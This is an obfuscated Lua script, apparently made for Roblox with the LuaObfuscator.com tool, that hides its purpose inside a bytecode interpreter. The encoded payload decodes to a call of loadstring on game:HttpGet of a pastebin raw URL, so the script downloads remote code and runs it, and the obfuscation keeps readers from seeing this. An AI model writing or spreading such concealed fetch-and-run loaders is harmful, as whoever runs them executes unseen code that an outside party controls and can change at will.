--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v90=0;while true do if (v90==0) then v19=v0(v3(v30,1,1));return "";end end else local v91=0;local v92;while true do if (v91==0) then v92=v2(v0(v30,16));if v19 then local v122=v5(v92,v19);v19=nil;return v122;else return v92;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v93=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(2 -1))) + 1)) ;return v93-(v93%(620 -(555 + 64))) ;else local v94=(933 -(857 + 12 + 62))^(v32-(569 -(367 + 201))) ;return (((v31%(v94 + v94))>=v94) and (928 -(214 + 713))) or ((877 -(282 + 595)) + 0) ;end end local function v21() local v34=1637 -(1523 + 114) ;local v35;while true do if (v34==((1065 -(68 + 997)) + (1270 -(226 + 1044)))) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=1;end if (v34==1) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;return (v37 * 256) + v36 ;end local function v23() local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + (9 -5) ;v38=(181 -(67 + 113)) -(0 + 0) ;end if (v38==(1 -0)) then return (v42 * 16777216) + (v41 * (65886 -(87 + 263))) + (v40 * 256) + v39 ;end end end local function v24() local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,1 + 0 + 0 ,79 -59 ) * ((954 -(802 + 150))^(85 -53))) + v43 ;local v47=v20(v44,37 -16 ,23 + (13 -5) );local v48=((v20(v44,1029 -(915 + 82) )==(2 -1)) and  -(1 + 0)) or (1 -(438 -(145 + 293))) ;if (v47==((1617 -(44 + 386)) -(1069 + 118))) then if (v46==(0 -0)) then return v48 * (0 -0) ;else local v112=0 + 0 ;while true do if (v112==(0 -0)) then v47=1 + 0 ;v45=791 -(368 + (1909 -(998 + 488))) ;break;end end end elseif (v47==2047) then return ((v46==(0 -0)) and (v48 * ((19 -(10 + 8))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1465 -(416 + 26)) ) * (v45 + (v46/((6 -4)^52))) ;end local function v25(v49) local v50;if  not v49 then local v95=(0 -0) + 0 ;while true do if (v95==(0 + 0)) then v49=v23();if (v49==(772 -(201 + 571))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1139 -(116 + 1022)) );v18=v18 + v49 ;local v51={};for v67=1, #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v96,v97,v98,v99,v100,v101,v102,v103,v104) local v105=(function() return 1409 -(450 + 959) ;end)();local v96=(function() return;end)();local v97=(function() return;end)();while true do if ((572 -(426 + 146))~=v105) then else v96=(function() return 0 + 0 ;end)();v97=(function() return nil;end)();v105=(function() return 1991 -(582 + 1408) ;end)();end if (v105~=1) then else local v118=(function() return 0 -0 ;end)();while true do if (v118==(811 -(569 + 242))) then while true do if (0~=v96) then else v97=(function() return v98();end)();if (v99(v97, #"\\", #",")==(0 -0)) then local v164=(function() return 0 -0 ;end)();local v165=(function() return;end)();local v166=(function() return;end)();local v167=(function() return;end)();local v168=(function() return;end)();while true do if (v164==(1824 -(1195 + 629))) then v165=(function() return 0;end)();v166=(function() return nil;end)();v164=(function() return 1;end)();end if (v164~=(2 -0)) then else while true do if (2==v165) then local v170=(function() return 241 -(187 + 54) ;end)();local v171=(function() return;end)();while true do if (v170==(1024 -(706 + 318))) then v171=(function() return 780 -(162 + 618) ;end)();while true do if (v171~=(1252 -(721 + 530))) then else v165=(function() return  #"asd";end)();break;end if (v171==(0 + 0)) then if (v99(v167, #"[", #"<")== #"~") then v168[2]=(function() return v100[v168[2]];end)();end if (v99(v167,2,2 + 0 )~= #"}") then else v168[ #"19("]=(function() return v100[v168[ #"91("]];end)();end v171=(function() return 1 -0 ;end)();end end break;end end end if (v165== #"{") then local v172=(function() return 0 -0 ;end)();local v173=(function() return;end)();while true do if (v172~=0) then else v173=(function() return 0 + 0 ;end)();while true do if (1==v173) then v165=(function() return 2 -0 ;end)();break;end if (v173==(0 + 0)) then v168=(function() return {v101(),v101(),nil,nil};end)();if (v166==0) then local v180=(function() return 0;end)();local v181=(function() return;end)();while true do if (v180==(1000 -(451 + 549))) then v181=(function() return 1500 -(1408 + 92) ;end)();while true do if (v181==(1086 -(461 + 625))) then v168[ #"91("]=(function() return v101();end)();v168[ #".com"]=(function() return v101();end)();break;end end break;end end elseif (v166== #"[") then v168[ #"91("]=(function() return v102();end)();elseif (v166==(1 + 1)) then v168[ #"xxx"]=(function() return v102() -((2 -0)^(1187 -(418 + 753))) ;end)();elseif (v166== #"-19") then local v186=(function() return 0 + 0 ;end)();local v187=(function() return;end)();while true do if (v186==(0 -0)) then v187=(function() return 1384 -(746 + 638) ;end)();while true do if (v187==0) then v168[ #"xnx"]=(function() return v102() -(2^(5 + 11)) ;end)();v168[ #"asd1"]=(function() return v101();end)();break;end end break;end end end v173=(function() return 1 + 0 ;end)();end end break;end end end if (v165~= #"asd") then else if (v99(v167, #"xxx", #"asd")~= #"}") then else v168[ #".dev"]=(function() return v100[v168[ #".com"]];end)();end v103[v104]=(function() return v168;end)();break;end if (v165==(0 -0)) then local v175=(function() return 529 -(406 + 123) ;end)();local v176=(function() return;end)();while true do if (v175~=(341 -(218 + 123))) then else v176=(function() return 1581 -(1535 + 46) ;end)();while true do if (v176~=1) then else v165=(function() return  #">";end)();break;end if ((1322 -(1249 + 73))==v176) then v166=(function() return v99(v97,2, #"asd");end)();v167=(function() return v99(v97, #".dev",6);end)();v176=(function() return 1 + 0 ;end)();end end break;end end end end break;end if (v164~=1) then else local v169=(function() return 0 + 0 ;end)();while true do if (v169==(1145 -(466 + 679))) then v167=(function() return nil;end)();v168=(function() return nil;end)();v169=(function() return 1;end)();end if ((1 + 0)==v169) then v164=(function() return 2;end)();break;end end end end end break;end end return v96,v97,v98,v99,v100,v101,v102,v103,v104;end end end end end;end)();local v53=(function() return function(v106,v107,v108) local v109=(function() return 0 -0 ;end)();while true do if (v109==(560 -(306 + 254))) then v106[v107-#"|" ]=(function() return v108();end)();return v106,v107,v108;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"[",v58 do local v70=(function() return 0;end)();local v71=(function() return;end)();local v72=(function() return;end)();local v73=(function() return;end)();while true do if (v70==(1 + 0)) then v73=(function() return nil;end)();while true do if (v71==0) then v72=(function() return v21();end)();v73=(function() return nil;end)();v71=(function() return 1 + 0 ;end)();end if (v71==(1 + 0)) then if (v72== #"{") then v73=(function() return v21()~=(0 -0) ;end)();elseif (v72==(1469 -(899 + 568))) then v73=(function() return v24();end)();elseif (v72== #"xxx") then v73=(function() return v25();end)();end v59[v69]=(function() return v73;end)();break;end end break;end if (0==v70) then local v113=(function() return 0;end)();while true do if (v113==(0 -0)) then v71=(function() return 0 + 0 ;end)();v72=(function() return nil;end)();v113=(function() return 2 -1 ;end)();end if (v113==(604 -(268 + 335))) then v70=(function() return 1;end)();break;end end end end end v57[ #"xnx"]=(function() return v21();end)();for v74= #"}",v23() do FlatIdent_43862,Descriptor,v21,v20,v59,v22,v23,v54,v74=(function() return v52(FlatIdent_43862,Descriptor,v21,v20,v59,v22,v23,v54,v74);end)();end for v75= #"}",v23() do v55,v75,v28=(function() return v53(v55,v75,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[585 -(57 + 527) ];local v65=v61[1429 -(41 + 1386) ];local v66=v61[106 -(17 + 86) ];return function(...) local v76=v64;local v77=v65;local v78=v66;local v79=v27;local v80=1 + 0 ;local v81= -(1 -0);local v82={};local v83={...};local v84=v12("#",...) -(1 + 0) ;local v85={};local v86={};for v110=0,v84 do if (v110>=v78) then v82[v110-v78 ]=v83[v110 + (167 -(122 + 44)) ];else v86[v110]=v83[v110 + (1 -0) ];end end local v87=(v84-v78) + ((2 + 0) -(477 -(41 + 435))) ;local v88;local v89;while true do local v111=0 -0 ;while true do if ((1 + 0)==v111) then if (v89<=(1 + 2)) then if (v89<=(1 -0)) then if ((v89>(65 -(30 + (1036 -(938 + 63))))) or (1871<636)) then local v124=v88[2];local v125=v86[v88[(11 + 3) -11 ]];v86[v124 + (754 -(239 + (1639 -(936 + 189)))) ]=v125;v86[v124]=v125[v88[3 + 1 ]];else do return;end end elseif ((v89==((415 + 844) -(1043 + 214))) or (4061<2572)) then local v129;local v130,v131;local v132;local v133;v86[v88[(1620 -(1565 + 48)) -5 ]]=v63[v88[1215 -(323 + 550 + 339) ]];v80=v80 + (2 -1) ;v88=v76[v80];v86[v88[582 -((1499 -(782 + 356)) + 219) ]]=v63[v88[3]];v80=v80 + (321 -((320 -(176 + 91)) + 267)) ;v88=v76[v80];v133=v88[1 + 1 ];v132=v86[v88[416 -(15 + 398) ]];v86[v133 + 1 ]=v132;v86[v133]=v132[v88[986 -((46 -28) + 964) ]];v80=v80 + (3 -(2 -0)) ;v88=v76[v80];v86[v88[2 + 0 ]]=v88[241 -(64 + 174) ];v80=v80 + 1 + 0 ;v88=v76[v80];v133=v88[852 -(20 + 830) ];v130,v131=v79(v86[v133](v13(v86,v133 + 1 + 0 ,v88[129 -(116 + (1102 -(975 + 117))) ])));v81=(v131 + v133) -(217 -(42 + 174)) ;v129=0 + 0 ;for v158=v133,v81 do v129=v129 + (1876 -(157 + 1718)) + 0 ;v86[v158]=v130[v129];end v80=v80 + (739 -(542 + 196)) ;v88=v76[v80];v133=v88[3 -1 ];v86[v133]=v86[v133](v13(v86,v133 + 1 + 0 ,v81));v80=v80 + 1 + 0 ;v88=v76[v80];v86[v88[1506 -((1288 -925) + 1141) ]]();v80=v80 + 1 ;v88=v76[v80];do return;end else v86[v88[2 + 0 ]]=v88[3];end elseif (v89<=(2 + 3)) then if ((1881>=1293) and (v89==(3 + (3 -2)))) then v86[v88[4 -2 ]]=v63[v88[7 -(1022 -(697 + 321)) ]];else v86[v88[1553 -(1126 + 425) ]]();end elseif ((2357==2357) and (v89==(411 -(118 + (781 -494))))) then local v152=v88[7 -5 ];v86[v152]=v86[v152](v13(v86,v152 + 1 ,v81));else local v154=v88[1123 -(118 + (2124 -1121)) ];local v155,v156=v79(v86[v154](v13(v86,v154 + (2 -1) ,v88[380 -(142 + 235) ])));v81=(v156 + v154) -((8 -4) -3) ;local v157=0 -0 ;for v161=v154,v81 do v157=v157 + 1 + 0 ;v86[v161]=v155[v157];end end v80=v80 + (857 -(220 + 344 + 292)) ;break;end if ((123==123) and (v111==0)) then v88=v76[v80];v89=v88[1 -0 ];v111=2 -1 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F454178667A54447900083O0012023O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
